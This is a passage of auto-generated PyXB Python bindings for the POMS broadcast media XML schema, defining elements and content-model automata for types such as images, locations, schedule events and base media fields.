return fac.Automaton(states, counters, True, containing_state=None)
segmentsType._Automaton = _BuildAutomaton_7()
imagesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_shared, 'image'), _ImportedBinding_npoapi_xml_shared.imageType, scope=imagesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 8, 2)))
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 657, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(imagesType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_shared, 'image')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 657, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
imagesType._Automaton = _BuildAutomaton_8()
groupTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'group'), groupType, scope=groupTableType, documentation='\n A groups collects a number of programs and/or other groups. Examples: season, series, playlist and album.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 32, 2)))
def _BuildAutomaton_9 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_9
del _BuildAutomaton_9
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(groupTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'group')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 676, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
groupTableType._Automaton = _BuildAutomaton_9()
locationTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'location'), locationType, scope=locationTableType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6)))
locationTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), scheduleEventType, scope=locationTableType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6)))
def _BuildAutomaton_10 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_10
del _BuildAutomaton_10
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(locationTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'location')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(locationTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
locationTableType._Automaton = _BuildAutomaton_10()
scheduleEventsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), scheduleEventType, scope=scheduleEventsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6)))
def _BuildAutomaton_11 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_11
del _BuildAutomaton_11
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
scheduleEventsType._Automaton = _BuildAutomaton_11()
locationsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'location'), locationType, scope=locationsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6)))
def _BuildAutomaton_12 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_12
del _BuildAutomaton_12
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(locationsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'location')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
locationsType._Automaton = _BuildAutomaton_12()
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'crid'), pyxb.binding.datatypes.anyURI, scope=baseMediaType, documentation='\n A crid (content reference identifier) is a reference to an entity in another system. E.g. a crid like\n crid://broadcast.radiobox2/335793 refers to a broadcast with id 335793 in Radiobox. A crid must be a valid\n URI starting with "crid://". Crids must be unique, but they can be made up freely. It is a good idea to use\n a logical structure which can easily be associated with another system. Any POMS object can have zero or\n more crids. They can refer to different systems, but a POMS object could also actually represent more than\n one entity in a remote system.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'broadcaster'), broadcasterType, scope=baseMediaType, documentation='\n One or more broadcasters can be the owner of a POMS media object. This information is meta information about the object, but it is also used\n for assigning write access to the object in the POMS backend to employees of these given broadcasting companies.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'portal'), organizationType, scope=baseMediaType, documentation="\n Optionally 'portals' can be assigned to a media object. Portals are also 'owners', and employees can also work for a certain portal.\n This is because some portal are shared by several broadcasting companies.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'exclusive'), portalRestrictionType, scope=baseMediaType, documentation="\n Besides having portals, which mainly indicates where the object originates, a media object can also be assigned 'portal restrictions'.\n If a media object has any portal restrictions the media object may only be shown on these portals.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'region'), geoRestrictionType, scope=baseMediaType, documentation="\n Media with a geo restriction can only be played in the indicated region (NL, BENELUX, WORLD). This\n restriction doesn't apply to the metadata of the media object. It only applies to the actual playable content.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'title'), titleType, scope=baseMediaType, documentation='\n A media object has one or more titles. All titles have a type (MAIN, SUB etc.) and an owner (BROADCASTER, MIS etc.).\n The combination of type and owner is always unique for a particular media object, so a media object cannot\n have multiple titles of the same type and owner. Titles are sorted in order of the textualTypeEnum and the in order\n of ownerTypeEnum when published, so the first title in a published document will be a title owned by BROADCASTER of type\n MAIN, if that title exists.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'description'), descriptionType, scope=baseMediaType, documentation='\n Optional descriptions for the media object. Descriptions have an owner and a type, and are ordered just like titles.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'genre'), genreType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'tag'), tagType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'intentions'), intentionType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'targetGroups'), targetGroupsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'geoLocations'), geoLocationsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'topics'), topicsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'source'), pyxb.binding.datatypes.string, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'country'), countryType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'language'), languageType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'isDubbed'), pyxb.binding.datatypes.boolean, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles'), availableSubtitleType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), avAttributesType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'releaseYear'), pyxb.binding.datatypes.short, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'duration'), pyxb.binding.datatypes.duration, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'credits'), creditsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'award'), pyxb.binding.datatypes.string, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'descendantOf'), descendantRefType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), memberRefType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ageRating'), ageRatingType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'contentRating'), contentRatingType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'email'), pyxb.binding.datatypes.anyURI, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'website'), websiteType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'twitter'), twitterType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'teletext'), pyxb.binding.datatypes.short, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'prediction'), predictionType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'locations'), locationsType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'relation'), relationType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6)))
baseMediaType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'images'), imagesType, scope=baseMediaType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6)))
def _BuildAutomaton_13 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_13
del _BuildAutomaton_13
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
